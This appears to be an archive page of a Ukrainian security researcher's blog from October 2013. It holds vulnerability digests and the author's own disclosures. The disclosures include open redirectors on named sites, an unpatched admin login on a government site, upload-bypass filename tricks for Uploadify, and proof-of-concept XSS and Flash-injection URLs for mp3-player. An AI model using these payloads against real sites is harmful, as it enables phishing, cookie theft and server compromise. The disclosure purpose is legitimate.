Архів для категорії 'Уразливості'

Добірка уразливостей

17:28 29.10.2013

В даній добірці уразливості в веб додатках:

  • EMC Smarts Network Configuration Manager (деталі)
  • SQL Injection vulnerability in otrs (деталі)
  • EMC Smarts Product - Cross Site Scripting Vulnerability (деталі)
  • Vulnerability in xymon (деталі)
  • Novell GroupWise Multiple Remote Code Execution Vulnerabilities (деталі)
  • Path Traversal in DeWeS Web Server (Twilight CMS) (деталі)
  • Multiple vulnerabilities in Sophos Web Protection Appliance (деталі)
  • Cross-Site Scripting (XSS) in Twilight CMS (деталі)
  • Authentication bypass on Netgear WNR1000 (деталі)
  • XML External Entity (XXE) injection in Spring Framework (деталі)

Уразливості на nrcu.gov.ua

23:53 26.10.2013

16.05.2013

У грудні, 20.12.2012, я знайшов Cross-Site Scripting та Brute Force уразливості на сайті http://nrcu.gov.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно державних сайтів в останнє я писав про уразливості на zpd.gov.ua.

Детальна інформація про уразливості з’явиться пізніше.

26.10.2013

XSS:

Brute Force:

http://nrcu.gov.ua/admin/

Дані уразливості досі не виправлені. Що типово для українських державних сайтів.

Добірка уразливостей

17:22 25.10.2013

В даній добірці уразливості в веб додатках:

  • Alt-N MDaemon Email Body HTML/JS Injection Vulnerability (деталі)
  • Joomla! redSHOP component v1.2 SQL Injection (деталі)
  • Alt-N MDaemon’s WorldClient Predictable Session ID Vulnerability (деталі)
  • ReviewBoard Vulnerabilities (деталі)
  • Alt-N MDaemon’s WorldClient & WebAdmin Cross-Site Request Forgery Vulnerability (деталі)
  • Struts2 Prefixed Parameters OGNL Injection Vulnerability (деталі)
  • libxslt vulnerability (деталі)
  • Struts2 Prefixed Parameters Open Redirect Vulnerability (деталі)
  • Virtual Access Monitor Multiple SQL Injection Vulnerabilities (деталі)
  • CakePHP AssetDispatcher Local File Inclusion Vulnerability (деталі)

AFU та IL уразливості в Uploadify

23:54 24.10.2013

20.09.2013

У вересні, 12.09.2013, я знайшов Arbitrary File Uploading та Information Leakage уразливості в Uploadify. Про що найближчим часом повідомлю розробникам веб додатку.

Раніше я вже писав про уразливості в Uploadify.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

24.10.2013

Arbitrary File Uploading (WASC-31):

Code Execution атака через AFU. Для виконання коду можна використати “;” в імені файла (1.asp;.jpg) на IIS або використати подвійні розширення (1.php.jpg) на Apache.

Information Leakage (WASC-13):

Перевірка наявності довільного файла на сервері.

Uploadify IL.html

Уразливі Uploadify v3.2.1 та попередні версії.

Уразливості в плагінах для WordPress №120

22:44 23.10.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Complete Gallery Manager, Comment Attachment та Cart66. Для котрих з’явилися експлоіти. Complete Gallery Manager - це плагін для створення галерей зображень, Comment Attachment - це плагін для додавання вкладень до коментарів, Cart66 - це плагін для створення онлайн-магазину.

  • WordPress Complete Gallery Manager 3.3.3 File Upload (деталі)
  • WordPress Comment Attachment 1.0 Cross Site Scripting (деталі)
  • Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:25 23.10.2013

В даній добірці уразливості в веб додатках:

  • Alt-N MDaemon’s WorldClient Disclosure of Authentication Credentials Vulnerability (деталі)
  • Joomseller “Events Booking Pro” and “JSE Event” reflected XSS (деталі)
  • Alt-N MDaemon’s WebAdmin Remote Code Execution Vulnerability (деталі)
  • Multiple Vulnerabilities in BigTree CMS (деталі)
  • Alt-N MDaemon’s WorldClient Username Enumeration Vulnerability (деталі)
  • Apache CloudStack Cross-site scripting (XSS) vulnerability (деталі)
  • EMC Smarts Network Configuration Manager - RCE Vulnerability (деталі)
  • Trustport Webfilter Remote File Access Vulnerability (деталі)
  • EMC Smarts Product - Cross Site Scripting Vulnerability (деталі)
  • PHPFox v3.6.0 (build3) Multiple SQL Injection vulnerabilities (деталі)

Редиректори на популярних сайтах №7

23:52 22.10.2013

Продовжую розповідати вам про редиректори на популярних сайтах. Редиректори - це окремий різновид уразливостей в веб додатках, котрий відноситься до класу Abuse of Functionality. Дані уразливості можуть використовуватися зловмисниками для переадресації на небезпечні та фішинг сайти.

До наведених в попередньому записі, приведу ще декілька прикладів редиректорів на популярних веб сайтах.

Редиректори на популярних сайтах:

Liveinternet.ru (до раніше згаданих редиректорів на Liveinternet.ru):

http://liveinternet.ru/click?websecurity.com.ua

http://li.ru/click?websecurity.com.ua

Odnoklassniki.ru:

Редиректор на Однокласніках

Уразливості на www.odnoklassniki.ru

23:53 12.10.2013

У серпні соціальна мережа “Одноклассники” проводила конкурс на пошук уразливостей “Нация тестирует!” (з виплатою винагород за уразливості). Тоді я вирішив прийняти участь в цьому конкурсі, бо неодноразово знаходив дірки в різних соціальних мережах і в різних проектах Mail.ru (таких як drive.mail.ru, top.mail.ru, gogo.ru, rb.mail.ru і blogs.mail.ru).

Тоді я знайшов чимало різних уразливостей, деякі з яких вислав Однокласникам. Зокрема декілька знайдених 17.08.2013 уразливостей на http://www.odnoklassniki.ru. Для початку - щоб оцінити, як вони сприймають і оплачують дірки. Ось дві з них: Redirector та Information Leakage. На свого листа я отримав “автоматичну” відповідь, що мого листа отримано і все. Жодної відповіді представників компанії та виправлення уразливостей - ці та інші дірки досі не виправлені.

Redirector (URL Redirector Abuse):

odnoklassniki.ru Redirector.html

Information Leakage:

Витік інформації про Java пакети і версію веб сервера.

odnoklassniki.ru Information Leakage.html

Що дуже типово для соціальних мереж. Які забивають на безпеку, не відповідають на листи і не виплачують винагород за уразливості (навіть якщо і заявляють про проведення подібних виплат), а якщо й виправляють повідомленні дірки, то втихаря, без подяки дослідникам безпеки. Як я мав досвід з MySpace, Facebook і Яндекс в попередні роки.

Витоки інформації на різних сайтах

17:25 12.10.2013

У вересні, 24.09.2013, під час аудиту безпеки я знайшов Information Leakage уразливості на одному сайті ПриватБанка, що призводять до витоку персональних даних клієнтів. А у жовтні знайшов аналогічні витоки інформації на інших сайтах українських компаній, що надають подібні послуги. При тому, що на деяких подібних сайтах, якими я найбільше користуюся, таких витоків немає (тобто це залежить від їх відношення до персональних даних).

Перелік конкретних сайтів, що дозволяють витоки персональних даних, оприлюдню пізніше. Про дані уразливості я вже повідомив ПриватБанк і найближчим часом сповіщу адміністрацію інших сайтів.

Детальна інформація про уразливості з’явиться пізніше.

Уразливості в mp3-player

23:53 11.10.2013

12.08.2013

У травні, 22.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в mp3-player. Про що вже повідомив розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

11.10.2013

XSS (через Flash Injection) (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Flash Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=http://site2/1.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3

Content Spoofing (HTML Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E

XSS (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=+%3Cimg%20src=%27xss.swf%27%3E

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

XSS (Strictly social XSS) (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Уразливі mp3-player 2.5 та попередні версії.